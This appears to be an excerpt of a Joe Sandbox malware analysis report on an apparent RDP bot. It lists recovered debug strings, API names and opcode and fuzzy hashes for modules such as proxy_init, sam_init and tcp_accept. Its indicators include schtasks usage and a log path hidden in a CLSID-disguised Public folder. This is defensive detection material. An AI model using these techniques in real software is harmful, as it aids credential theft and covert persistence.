                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                    • API String ID: 39653677-3302659514
                                    • Opcode ID: 4dc76e705db6eb56d91b9e7fc641db9eef79bc119d044e88716ceefa20f9013f
                                    • Instruction ID: f2afef3b16aa5785cc77a9dd0a4f7a680a11837ae644ff146e9d721acb168693
                                    • Opcode Fuzzy Hash: 4dc76e705db6eb56d91b9e7fc641db9eef79bc119d044e88716ceefa20f9013f
                                    • Instruction Fuzzy Hash: 76418B61A0BA83D5FA21BB14E8503F8A751BF60384FDA51B2D54E07AB5EF3CA5478320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                    • API String ID: 2278979430-4175654481
                                    • Opcode ID: 1ba63ccbe9f7202d9b606c2b9e143d7ff2fedeb48676469846514bfdad26601e
                                    • Instruction ID: c4a327a4930521d4f0fb060666243a63c92680db3c354728210212795deeb138
                                    • Opcode Fuzzy Hash: 1ba63ccbe9f7202d9b606c2b9e143d7ff2fedeb48676469846514bfdad26601e
                                    • Instruction Fuzzy Hash: 8551CFB2A196C285E7228B35EC443AD6661AB667B4F1C0372D97D27AE8EF3DD405C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                    • API String ID: 1004003707-636894343
                                    • Opcode ID: 55ac09910bedfcbea2a922a39b475839cb3386a6c7cfdb4ef017326a7d6b2971
                                    • Instruction ID: 8e03a9f4450303536a29689beb02fe7e70b7a23eaa109a3171d13b075e707e80
                                    • Opcode Fuzzy Hash: 55ac09910bedfcbea2a922a39b475839cb3386a6c7cfdb4ef017326a7d6b2971
                                    • Instruction Fuzzy Hash: 1841E8E1E0C6C795FB169B21EE413F52260BF0A348F554132EA4D966B5DFBCAD86C340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                    • API String ID: 1004003707-636894343
                                    • Opcode ID: cb3bdf84bb294d59d6a1715e093358a2d6fb8b1e30ed69b036d87315b8b44141
                                    • Instruction ID: fb2520c3373ee19cc18d5eca2391acec6e8a44306504ca44950231a389cf3921
                                    • Opcode Fuzzy Hash: cb3bdf84bb294d59d6a1715e093358a2d6fb8b1e30ed69b036d87315b8b44141
                                    • Instruction Fuzzy Hash: DC412FE1A18ACB95FA969B20EC407FC6260BF0A348F4C41B2DA5D2A595DF3CE647C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                    • API String ID: 1004003707-4168131722
                                    • Opcode ID: a21304e99163152a7b7a5e6e0e17c7d516252c4189549a088e36afb3d51a28d2
                                    • Instruction ID: 6f998c2f78e6bd12b50c82b639ba34a20d79d805bc877da44348c28ed09e4c4c
                                    • Opcode Fuzzy Hash: a21304e99163152a7b7a5e6e0e17c7d516252c4189549a088e36afb3d51a28d2
                                    • Instruction Fuzzy Hash: A541FAE1E0C6C795FB239B21EE517F42260AB1A348F444136DA0D9A5B5DFBCED86C380
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                    • API String ID: 1004003707-4168131722
                                    • Opcode ID: 1e0773444fa5bbe13f167a8c3d5b9f59777dd6178e7bb6a89494947c8f4e2965
                                    • Instruction ID: cc112bbdab10d44d2665b97f8b1d3686f25bcb655eecac9515ea8c1d78f2c6af
                                    • Opcode Fuzzy Hash: 1e0773444fa5bbe13f167a8c3d5b9f59777dd6178e7bb6a89494947c8f4e2965
                                    • Instruction Fuzzy Hash: 8C4132E1A18ACF95FA969B30EC407BC2250BB1A348F4C42B2DA5D26599DF3CE647C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    • API String ID: 285244410-4028107517
                                    • Opcode ID: cc3e34ee72cf39ab28ca4f50e84754200715793d60b355529230138951768346
                                    • Instruction ID: 9ad4f25a2eab545baba3047e3d184becdf6390c7bdbb1393ddb395a6807553f9
                                    • Opcode Fuzzy Hash: cc3e34ee72cf39ab28ca4f50e84754200715793d60b355529230138951768346
                                    • Instruction Fuzzy Hash: 6B3108E1F1D59381FF568B24EC613B82261AF46B84F444035C85D8B3B0EEACED85D342
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    • API String ID: 285244410-4028107517
                                    • Opcode ID: 8ffe8d3f2cb2c94b7314edfb1bd75ec74e53f991a1248c8ff4180b55ae0506ef
                                    • Instruction ID: 3e1f5cca4747140e247477e7f39523248bdacc3d1c76c4546c9f55e0dc0584f6
                                    • Opcode Fuzzy Hash: 8ffe8d3f2cb2c94b7314edfb1bd75ec74e53f991a1248c8ff4180b55ae0506ef
                                    • Instruction Fuzzy Hash: 263103E5E0DA8381FA169B35EE543B42361AF4AB84F488135C94DCB3B0DEACEC45C340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    • API String ID: 285244410-4028107517
                                    • Opcode ID: 6cd0e2940794b827f88963b9ea89a5655d9a696eb30f6036814794fb0c064db2
                                    • Instruction ID: 7f03e6716d190cebe4469dddca7c4c33fc367d274b2183224016764b40502244
                                    • Opcode Fuzzy Hash: 6cd0e2940794b827f88963b9ea89a5655d9a696eb30f6036814794fb0c064db2
                                    • Instruction Fuzzy Hash: 2A310FE8E0959381FA178F39EC9877D2261FF84784F5C40B5C8CD272A4DE2CEA459340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    • API String ID: 285244410-4028107517
                                    • Opcode ID: 1c1f021130939825bb1d08879dabc2e55e13a3767f10cc75ef6f8872d0639300
                                    • Instruction ID: cbbafa51509626aa74af806b502ee1b5c02510d99418411020bd023137e1b995
                                    • Opcode Fuzzy Hash: 1c1f021130939825bb1d08879dabc2e55e13a3767f10cc75ef6f8872d0639300
                                    • Instruction Fuzzy Hash: 78314DE1E0D69381FE1A9F60EC607742261AF52B94F484135C94D9B3B0EEECEE49D300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    • API String ID: 285244410-4028107517
                                    • Opcode ID: 39f2d110513aaaf576bf52ed9d8eb4146c03c4bd47dd012bde0576d05d6fb516
                                    • Instruction ID: 21c8428449c23d4c478645d03111c6418081914c9d075f3dd2961fc6e26942ab
                                    • Opcode Fuzzy Hash: 39f2d110513aaaf576bf52ed9d8eb4146c03c4bd47dd012bde0576d05d6fb516
                                    • Instruction Fuzzy Hash: 633130E1E2D98B81FE579B24EC5437C2361AF46B94F4C45B1C85E3B7A0EE2CA946C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                    • API String ID: 3179112426-3318474754
                                    • Opcode ID: 7b955b83687b484f1dea81e130f191051db80d63fe7d011c6fb5ea590d81b79c
                                    • Instruction ID: 41bcfabf5fbab48a22b9297563e74c9d70d1c5b396ce3457ee360132a90de286
                                    • Opcode Fuzzy Hash: 7b955b83687b484f1dea81e130f191051db80d63fe7d011c6fb5ea590d81b79c
                                    • Instruction Fuzzy Hash: 6E31B4E0F1C68392FB224734ECD63B922A49F0B355F500036C91EC62B1AEDDAD85A247
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                    • API String ID: 3179112426-2019511216
                                    • Opcode ID: bdf5231d5a7a62b8eeffd5079e20df21f436e944fc87a69db881656bff7e6d57
                                    • Instruction ID: b929aa87d50cca38b3a3188909785b7d0f0c71288200dca2055b40907afee715
                                    • Opcode Fuzzy Hash: bdf5231d5a7a62b8eeffd5079e20df21f436e944fc87a69db881656bff7e6d57
                                    • Instruction Fuzzy Hash: 8531FAD0B0D683C1FB7A4734DCD0BBA52509F6B704E600536C54EC62B5AEEEAE9CC281
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcpy
                                    • String ID: *$schtasks
                                    • API String ID: 2790333442-2394224502
                                    • Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                    • Instruction ID: b756dd8959148c77abbd8183d33244a354df22fb44a4da298c607ae4497537df
                                    • Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                    • Instruction Fuzzy Hash: 7151B5A2A0C6C3C5FB765A35ED513B95251AB8F384F580035DA4E973FADEACDC058700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                    • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                    • API String ID: 3537583691-1494920791
                                    • Opcode ID: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
                                    • Instruction ID: 8c5bab2e9a1e6aa0f2ac203fca1d63839c5dfc1f28e68b56ddec946fcb7459b1
                                    • Opcode Fuzzy Hash: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
                                    • Instruction Fuzzy Hash: 9A419FE1A09A8292EA128B31EC4437E23A5FB56B84F4C45B5DA0D633A9DF3CE545C340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
                                    • API String ID: 513531256-1037688549
                                    • Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                    • Instruction ID: e6f8096aee261ef4cde6e8aac0dbdfd577698e1f053b1dcfc6d4942e116f0ee9
                                    • Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                    • Instruction Fuzzy Hash: F3417DA5A1C6C186F7229B31EC507BAB2A0EB8A780F500035DE4DC77A5DFACED91C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                    • API String ID: 513531256-4171087551
                                    • Opcode ID: 1c78b1efae91c39788277ccbb029fb8becfea4ebd31fac5e190fe197ddb8946f
                                    • Instruction ID: 7d7b3520793ae13bfd512f331d0a2bf302511ea73d1187dd70641b24301ed523
                                    • Opcode Fuzzy Hash: 1c78b1efae91c39788277ccbb029fb8becfea4ebd31fac5e190fe197ddb8946f
                                    • Instruction Fuzzy Hash: B0417131A0FA85CAF330BB54E8513B9E2A1FB94780FC600B5EA0D576A5CF3CE5428760
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
